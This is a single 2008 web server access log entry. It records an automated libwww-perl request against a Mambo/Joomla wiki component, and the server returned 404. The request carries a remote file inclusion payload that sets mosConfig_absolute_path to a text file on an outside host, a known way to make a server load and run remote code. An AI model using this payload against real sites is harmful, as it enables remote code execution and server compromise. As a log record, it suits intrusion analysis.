208.116.44.60 - - [04/May/2008:13:05:45 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
